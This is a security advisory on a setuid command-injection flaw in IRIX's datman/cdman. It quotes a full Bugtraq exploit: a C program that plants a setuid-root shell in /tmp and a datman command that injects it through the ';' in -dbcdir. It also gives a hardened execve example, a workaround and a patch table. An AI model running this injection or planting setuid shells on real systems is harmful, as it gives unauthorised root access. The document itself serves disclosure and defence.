COMMAND

    /usr/sbin/datman & cdman

SYSTEMS AFFECTED

    IRIX 5.3...6.2 (if dmedia_tools.sw.cddat subsystem installed)

PROBLEM

    For backward compatibility reasons, datman looks for a file
    .cdplayerrc in the home directory on startup.  If it exists and
    the directory ~/.cddb doesn't exist, datman asks whether you want
    to convert .cdplayerrc to .cddb.  If you answer yes, it invokes
    /usr/sbin/cddbcvt with the old and new database names as
    arguments, using system().  The command therefore passes through
    the shell, and a database name containing shell metacharacters
    (such as the ';' in the -dbcdir argument below) is executed with
    datman's privileges.  Yuri Volobuev posted an exploit to Bugtraq:

    % cat > /tmp/makesh.c
    main()
    {
      seteuid(0); setegid(0);
      system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
    }
    % cc /tmp/makesh.c -o /tmp/makesh
    % mv .cddb .cddb.old
    % touch .cdplayerrc
    % /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh"
      Created "/tmp/blah"
    Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah

    % ls -l /tmp/sh
    -r-sr-sr-x    1 root     sys       140784 Dec  9 15:24 /tmp/sh*
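
    The safer way to invoke such a helper, as an added example (not
    datman's source and not part of the original advisory): the names
    go to the converter as separate argv elements with no shell, and
    the child drops privileges first.  The function names are
    hypothetical and /bin/echo stands in for the converter.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern the advisory describes: one string handed to system(), so the
 * shell parses any ';' in a database name. Built here for display only. */
int shell_command_line(char *buf, size_t len, const char *conv,
                       const char *old_db, const char *new_db)
{
    return snprintf(buf, len, "%s %s %s", conv, old_db, new_db);
}

/* Hardened form: no shell, each name is exactly one argv element, and the
 * child gives up setuid/setgid privileges before the helper runs.
 * Returns the helper's exit status (127 if exec failed), or -1 on error. */
int run_converter(const char *conv, const char *old_db, const char *new_db)
{
    char *const argv[] = { (char *)conv, (char *)old_db, (char *)new_db, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };  /* fixed environment */
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Drop group first, then user; refuse to continue if either fails. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execve(conv, argv, envp);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char line[256];
    const char *name = "/tmp/blah;/tmp/makesh";   /* value from the advisory */

    shell_command_line(line, sizeof line, "/usr/sbin/cddbcvt", ".cdplayerrc", name);
    printf("system() would hand the shell: %s\n", line);
    /* Stand-in converter: it receives the whole name as one argument. */
    return run_converter("/bin/echo", ".cdplayerrc", name);
}
```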

SOLUTION

    Until the patches are applied, remove the setuid bit:

        chmod -s /usr/sbin/datman

    Patches are:

        OS Version     Vulnerable?     Patch #
        ----------     -----------     -------
        IRIX 3.x          no
        IRIX 4.x          no
        IRIX 5.0.x        yes          not avail
        IRIX 5.1.x        yes          not avail
        IRIX 5.2          yes          not avail
        IRIX 5.3          yes          2563
        IRIX 6.0.x        yes          not avail
        IRIX 6.1          yes          not avail
        IRIX 6.2          yes          2564
        IRIX 6.3          yes          2565
        IRIX 6.4          yes          2291